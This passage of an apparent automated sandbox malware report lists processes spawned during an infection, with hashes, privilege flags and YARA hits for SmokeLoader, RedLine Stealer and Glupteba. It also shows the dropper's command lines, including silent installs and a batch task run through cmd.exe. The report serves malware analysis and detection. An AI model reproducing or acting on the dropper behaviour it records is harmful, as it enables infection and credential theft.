                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:true

                                                                                                                          Target ID:26
                                                                                                                          Start time:08:53:02
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:27
                                                                                                                          Start time:08:53:02
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'828'864 bytes
                                                                                                                          MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001B.00000002.3339978515.0000000000401000.00000040.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 75%, ReversingLabs
                                                                                                                          Has exited:false

                                                                                                                          Target ID:28
                                                                                                                          Start time:08:53:03
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:false

                                                                                                                          Target ID:29
                                                                                                                          Start time:08:53:04
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:30
                                                                                                                          Start time:08:53:04
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:31
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0
                                                                                                                          Imagebase:0xcd0000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:32
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:false

                                                                                                                          Target ID:33
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:34
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:35
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4'283'784 bytes
                                                                                                                          MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          Target ID:36
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0
                                                                                                                          Imagebase:0xe10000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:442BA51AC0AF3E8D9F489F643AFA6268
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:37
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:true

                                                                                                                          Target ID:38
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Target ID:39
                                                                                                                          Start time:08:53:10
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\2A8JXH5ilBvpWPJYIqcYohVL.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

Target ID: 40
Start time: 08:53:10
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
Imagebase: 0x400000
File size: 706'560 bytes
MD5 hash: F1EEAE7DAB5E51B2A76DB6651423C9F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 08:53:10
Start date: 12/03/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 08:53:10
Start date: 12/03/2024
Path: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
Imagebase: 0x4a0000
File size: 2'960'760 bytes
MD5 hash: 918151F14C10B6BB7533F6D97BF22D2D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 08:53:10
Start date: 12/03/2024
Path: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe" --silent --allusers=0
Imagebase: 0xc10000
File size: 2'960'760 bytes
MD5 hash: 45D3B5DA2599B55F638873CE9E5AF959
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 44
Start time: 08:53:14
Start date: 12/03/2024
Path: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exe"
Imagebase: 0x400000
File size: 1'956'920 bytes
MD5 hash: 17B5157E8F35F33EB2325EE5751BCF3B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 45
Start time: 08:53:14
Start date: 12/03/2024
Path: C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\FnEWeb8TPMfAXv33KZpKVFTq.exe"
Imagebase: 0x400000
File size: 4'283'784 bytes
MD5 hash: F0A6999F1BC47C6C468CF6DB95003AD5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 08:53:14
Start date: 12/03/2024
Path: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe"
Imagebase: 0x400000
File size: 175'104 bytes
MD5 hash: 89B400AF781E7D55812A77260DC1D9C8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002E.00000002.3117097610.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002E.00000002.3117320698.00000000006F2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited: true

Memory Dump Source
• Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5e15717882d7dd0509c01009685fd398c59f92ab953bb4a0a64d258c3b558ab
• Instruction ID: b6f0e4f5427387f38e5e68f444e2346141ea60a2854d658d8dde8fd6f6ffebe4
• Opcode Fuzzy Hash: d5e15717882d7dd0509c01009685fd398c59f92ab953bb4a0a64d258c3b558ab
• Instruction Fuzzy Hash: 59F0F6317043409FC706976CA85496ABFBAEFCA61071440AAE50DC7351CA284C1AC7A3
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c3ed07757609bce759ea37a12a1c3fbb61eaf45d61ba2a3253d60b6792395e22
                                                                                                                            • Instruction ID: e9afb67badeadc85bf9c13f8d0a42a651d5022d6abd49b339f7dc696c030f537
                                                                                                                            • Opcode Fuzzy Hash: c3ed07757609bce759ea37a12a1c3fbb61eaf45d61ba2a3253d60b6792395e22
                                                                                                                            • Instruction Fuzzy Hash: 7A01AD307002058FC704EB7CE5909ADB7A7EFD8310B208829D4169B36CCB75AD468B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2dcd8e457936896c628608f03f4b4b6504658a1db96fadc1377c215fa166b541
                                                                                                                            • Instruction ID: 44603fe89ea45857e0e1e1198ee3477097939d9377c7766c46857123758e523e
                                                                                                                            • Opcode Fuzzy Hash: 2dcd8e457936896c628608f03f4b4b6504658a1db96fadc1377c215fa166b541
                                                                                                                            • Instruction Fuzzy Hash: 95F0BB317142904FC756577C94545EA7BB5DFC662070A40E7D505CB252CA584C0BD7E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7be6ec0a18f423e2d5969e49c98f35257a66bd75ad1ea8338a8624aeb90a51f9
                                                                                                                            • Instruction ID: e1b0f0fb689c690d3cd122cae07d5d76d96ccaa0edbb82436bfb4d076b34cb87
                                                                                                                            • Opcode Fuzzy Hash: 7be6ec0a18f423e2d5969e49c98f35257a66bd75ad1ea8338a8624aeb90a51f9
                                                                                                                            • Instruction Fuzzy Hash: 2BF06D64B44119CBDB14AB6DC06872EB293BF95748F004469E506AB3EDCF389DC28796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cad53f173d3f21a9274358696c089710ba2096c0446f9468ed1c5ace94e704a2
                                                                                                                            • Instruction ID: 059e3e02f2f071d6367aee0bcba64639731b7836f73fcd787186676adb673c1e
                                                                                                                            • Opcode Fuzzy Hash: cad53f173d3f21a9274358696c089710ba2096c0446f9468ed1c5ace94e704a2
                                                                                                                            • Instruction Fuzzy Hash: C7F0E9322052011FC31A9B7E94504BE7BEABDC161031589BFD049CB669DF359C0A87D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7682d6cacb282787a276f684c1aa8014913e3294ec8bfa031d374acb9e2ddb2c
                                                                                                                            • Instruction ID: 8fc9d0c09d7aaf97efc3669957d8db395d82515850df7b3e427242ca38661616
                                                                                                                            • Opcode Fuzzy Hash: 7682d6cacb282787a276f684c1aa8014913e3294ec8bfa031d374acb9e2ddb2c
                                                                                                                            • Instruction Fuzzy Hash: E9F04F70B84205CFC754DB7C85597AEB6A2AB98244F204458E802AB36CCB744D85D7D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4eb6d80f259e87bb1457bc3673e1d95ee59acd57188c4d4d7b1f66a6153b9c19
                                                                                                                            • Instruction ID: 82065ea6467fabb7e084bf21483c3ad295abb335ae7ccfc880cfc0e0acb4338a
                                                                                                                            • Opcode Fuzzy Hash: 4eb6d80f259e87bb1457bc3673e1d95ee59acd57188c4d4d7b1f66a6153b9c19
                                                                                                                            • Instruction Fuzzy Hash: 46F0B464740119CFDB14AB3DC06862DB2936F95748F004469E506AB3FDCF389DC28796
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 97e1b87e650a6936297ea419f59dbbaac83e005219ec07ceb53c844ba5599304
                                                                                                                            • Instruction ID: 64f0f19dbf79cb153ca85b5b27b24cff8ac963bf53b7d3f038e2d9ddc9043b82
                                                                                                                            • Opcode Fuzzy Hash: 97e1b87e650a6936297ea419f59dbbaac83e005219ec07ceb53c844ba5599304
                                                                                                                            • Instruction Fuzzy Hash: 13E06131B141509FC755527C68145BB7BEAC7CA72070940B7D54DD7341CD150C0B83E3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c8199ab5e345ee0c6ffeafdef83fca023483905344afab1a40b823c1e0ec0a13
                                                                                                                            • Instruction ID: 7de2f314db7a5b264a80237a75c1c1c42e5061dd72d3ebc1aaa411f5cbdee57b
                                                                                                                            • Opcode Fuzzy Hash: c8199ab5e345ee0c6ffeafdef83fca023483905344afab1a40b823c1e0ec0a13
                                                                                                                            • Instruction Fuzzy Hash: B6F05E7190D3949FC742DB78D9A058D7FB4EE47210B0640EBC445CB262E6345E05DBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 14b29f3acdc577d0e218263a77a7a5934d1e354a6bc2125a8f36dd2a13fcb38e
                                                                                                                            • Instruction ID: 573ec91b3a6555f9b9a1d2a93ef7f9c8ce5a83ab58c067e5b694191926d28e84
                                                                                                                            • Opcode Fuzzy Hash: 14b29f3acdc577d0e218263a77a7a5934d1e354a6bc2125a8f36dd2a13fcb38e
                                                                                                                            • Instruction Fuzzy Hash: 1DD05E70A0510DEFCB40DFA9EA4199DB7BDEF44610B1081AED808D3324EB326F009B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.3410725874.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1710000_InstallUtil.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9eba8f0cf471fe3aee81d7f5306cf4dffa95ab6421d3dd5ed75c89d5146e5e2d
                                                                                                                            • Instruction ID: 94f3482004ec8dd1bc1bc99b5dcefc1a7844715a64d993521370e5ff08259405
                                                                                                                            • Opcode Fuzzy Hash: 9eba8f0cf471fe3aee81d7f5306cf4dffa95ab6421d3dd5ed75c89d5146e5e2d
                                                                                                                            • Instruction Fuzzy Hash: 78A0024519C419D58704167AC564429A4069A9134930515765A071A5FA5C981691919F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Execution Graph

• Execution Coverage: 21.3%
• Dynamic/Decrypted Code Coverage: 0%
• Signature Coverage: 2.4%
• Total number of Nodes: 1521
• Total number of Limit Nodes: 22
